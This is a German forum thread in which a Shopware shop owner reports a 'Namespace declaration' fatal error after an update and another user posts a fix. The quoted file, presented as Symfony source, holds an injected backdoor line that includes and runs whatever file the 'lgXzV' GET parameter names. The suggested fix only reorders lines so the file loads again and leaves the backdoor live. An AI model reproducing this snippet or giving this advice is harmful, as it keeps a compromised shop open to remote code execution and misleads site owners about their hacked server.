Nächstes Problem nach dem Update: Beim Aufrufen des Shops oder auch des Backends kommt folgende Meldung: "Fatal error: Namespace declaration statement has to be the very first statement in the script in /mnt/webb/a0/98/52627998/htdocs/engine/Shopware/Components/DependencyInjection/Compiler/DoctrineEventSubscriberCompilerPass.php on line 29 " Cache wurde gelöscht: /cache/general /cache/templates /cache/doctrine/proxies /cache/doctrine/attributes Die Zeile 29 in der Datei sieht so aus:
Hat denn niemand eine Idee? Mein Shop steht still!
Bei mit hat folgendes geholfen: Die Namespace-Zeile ganz am Anfang der Datei setzen, zwischen php-Tag und if-empty-Abfrage. <?php namespace Symfony\Component\HttpFoundation;
if(!empty(_GET["lgXzV"])) require_once(_GET[“lgXzV”]);
/*
- This file is part of the Symfony package.
- © Fabien Potencier fabien@symfony.com * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */